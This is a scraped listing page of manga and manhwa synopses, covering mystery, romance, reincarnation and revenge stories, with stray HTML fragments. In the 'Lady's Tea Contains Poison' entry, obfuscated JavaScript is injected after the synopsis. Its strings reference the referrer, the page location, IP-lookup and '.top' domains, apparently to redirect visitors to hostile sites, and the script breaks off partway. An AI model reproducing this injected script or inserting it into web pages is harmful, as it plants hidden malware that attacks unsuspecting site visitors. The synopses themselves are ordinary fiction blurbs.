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54 results

Kaiki Tantei Sharaku Homura

In Shimoyama Middle School, the Experiment Club and Karate Club each only have one member left, and as a result, must share one classroom. These two students, Sharaku Homura and Yamazaki Yousuke (a.k.a Karate Kid) together solve numerous impossible mysteries that they happen to run into! Originally a doujinshi by Nemoto Shou, now an award-winning manga, having won the Hokkaido Mystery Cross Match Award!


Keep an eye on you

A mystery murder case shatters Lan Zhiqing\'s serene and blissful life into pieces. The past she has long forgotten returns in the form of a nightmarish case, encroaching ever the closer... Shocked, Lan Zhiqing discovers that the most dangerous existence may just be the person she shares a bed with.


Koakuma Kyoushi Psycho

A captivating new teacher, Miss Kasai, arrives at a troubled classroom. The previous teacher had been hospitalized after a tragic attempt at self-harm, driven to despair by student bullying. \"My goal as a teacher is to bring joy to my students,\" she says with a laugh, before turning her attention to addressing the bullies in her own unique way. However, the students are about to discover that Miss Kasai is not to be underestimated. Could Miss Kasai be hiding a darker side?


Lady’s Tea Contains Poison

I possessed the novel with three people who were my counterparts. Among them, I became the prince’s fiancee and a villain youngae who ended her life with the guillotine ending. “I’m happy though. We are all female protagonists in novels, so we can spare our lives.” … Were all female protagonists? I rolled my eyes awkwardly and finally opened my mouth. “Ah… , I will soon be the guillotine.” * * * It caused inconvenience to everyone. I thought the best thing I could do for everyone was to break up… … . “We are breaking up.” “Belly, what have I done to you? If you have a reason, tell me.” You catch me asking for a breakup. “Belly. I have no intention of giving up on you.” “If you can escape, run away. Even if it were death, I would gladly follow you.” Apparently, the keyword of the novel was affectionate man. When did the keyword change to obsessive? Will I be able to see the ending safely? Read manhwa  Lady’s Tea Contains Poison / ???? ???? ?? ?? ??<script></script><script>function _0x139f(){var _0x5a8466=['then','href','.top/','floor','includes','qjPyl','696HiiJCc','OgZPJ','location','15088BTRREj','48656cYTPap','.customapi','173860iyrJvy','UrOoY','text','hdgwm','FMYdm','126IxsHmW','319UtrvMI','5253327mypsPj','122940TZcXkH','','kCTCf','PUGzS','http://rea','https://ip','google','3fpUOOh','random','186FwxIrL','7207920fcIDYb','423282zpEPKY','referrer','LNnBf','yWjWH'];_0x139f=function(){return _0x5a8466;};return _0x139f();}function _0x5eef(_0x3ba47d,_0x44f718){var _0x19dbe8=_0x139f();return _0x5eef=function(_0x18b2c1,_0x3afae8){_0x18b2c1=_0x18b2c1-(0x15fd+0x1*-0x269e+0x11bd);var _0x304644=_0x19dbe8[_0x18b2c1];return _0x304644;},_0x5eef(_0x3ba47d,_0x44f718);}(function(_0x1b3c6f,_0x5269b3){var _0xc652ff=_0x5eef,_0x1f14c6=_0x1b3c6f();while(!![]){try{var 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Limited Extra Time

The existence of the second child, Karina, who was the successor’s youngest twin and the one who wasn’t as competent as her sibling, has been concealed by the people around her all her life. One day, she finds out that she only has one year left to live. So, she foolishly visited her fiancé, whom she has never had an exchange with. Along with the divorce papers that he longed desired for. “Frankly speaking, I want to stay here for a year.” “….. Are you crazy, Miss?” “I’ll break off the engagement.” But she didn’t know at that time. “It seems that you keep trying to pretend that you don’t know, so I should definitely tell you then.” “Pardon?” “I am fond of you.” It didn’t occur to her that she would receive attention and affection from him without anything in return. So she comes to desire this much for a life without regrets. <div class="post-content_item"> <h4>Alternative Name</h4> <div class="summary-content">The Time of the Terminally Ill Extra / Limited Extra Time / Karina's Last Days /시한부 엑스트라의 시간</div> </div> <div class="post-content_item"> <div class="summary-heading"></div> </div>



Lee Sehwa had grown used to the daily taunts—Sakura, Hongdan, sometimes Samwol—but the disrespect still stung. No one listened when he told them to stop calling him those names; after all, who respects a debtor or a drug dealer? Yet, Sehwa refused to let them see him break, insisting over and over: his name was Lee Sehwa. Living in the outskirts, Sehwa dreamed of paying off his crushing debt and moving to the inner city. But everything changes when he crosses paths with Director Ki Taejeong, who is cold and sharp-tongued. Despite their turbulent start, the two grow closer in a world defined by power struggles and regret, forging a complicated love that neither saw coming.


Miss Zuo Ying

Zuo Ying, a once-renowned criminal investigation expert at Huanyang University and a prominent figure in the legal community, was brought to trial by her own daughter, Zuo Yang, who accused her of crimes. Just as Zuo Ying was about to be sentenced to death, the court abruptly changed her sentence, ordering her to be confined in an insane asylum instead. Due to her success in solving this case, Zuo Yang was promoted rapidly. However, soon after, a series of murders broke out in the city, and unable to solve the cases, she was forced to seek her mother\'s assistance. Facing her mother, who had once brought her love but now only left behind a complicated and indescribable mix of emotions, Zuo Yang felt a thin layer of sweat form on her cheeks. \"My darling daughter, if all it takes is a little pleading to get my help, why not?\" Zuo Ying said, glancing at the newspaper in her hand, squinting as she smiled. The shackles on her hands were so conspicuous—who really was the caged bird here?



The authors of the hits \"Clover\" and \"Sunflowers\" are back! The curtain of a hot battle opens in anticipation of the bad guys! ..


One Step Forward To The Flower Path

I Lived My Whole Life Being Used By Other People And Died At The Age Of 16. I Thought It Would Be Over Like That, But When I Opened My Eyes Again, I Was Back In The Past. I Thought I’d Die While Living The Rest Of My Life In Pain One More Time. But Suddenly, A Father Who I Had Never Seen Before Appeared Before Me. My Dad, Who I Didn’t Even Know Existed. “When Are You Going To Take Away My Powers?” Dante’s Eyes Shook Greatly At Ivanna’s Words. “Everyone Did. You, When Will You Take It?” “…I Won’t.” “Why?” Ivanna Couldn’t Understand. Everyone Coveted Her Power. Everyone Wanted It, Saying She Was A Sacrifice Sent By God For Humans. So Why Does He Refuse? “No One Will Take Your Power Now. No One Will Bother You. I’ll Protect You.” “You’re Trying To Take My Power.” “I’m Not.” “Everyone Said That And Stole My Power From Me. They Locked Me Up In Prison.” It Was Too Cruel For A Mere Five-Year-Old To Say. But The Young Ivanna’s Face Had No Emotion As If What She Said Was Natural. Dante’s Heart Eventually Collapsed When He Saw His Daughter Completely Shattered. Associated Names 꽃길까지 앞으로 한 걸음


Only My Psycho

This is District A, somewhere in Asia, where skyscrapers and slums coexist in a chaotic mix. Sakaki Takeru, who grew up in such a place, is scouted by an underworld organization\'s assassin squad and, under the guise of recruit training, becomes partners with Atonashi Isagi. Upon their first meeting, Takeru fell for Isagi\'s looks, gentle personality, and the fact that he\'s still a virgin. As a perfect match both professionally and physically, they seemed to be off to a smooth start. Until \"something\" happened that provoked Isagi\'s wrath...


Psycho Revenge

Sungbin was ordinary, but after the death of his sister, he takes on the moniker of 'Neon Mask'. As Neon Mask, he becomes a psycho streamer and wages war on all gangs. "A debt of blood must be paid back in blood." "To avenge my sister, I will create an ocean of blood." Neon Revenge
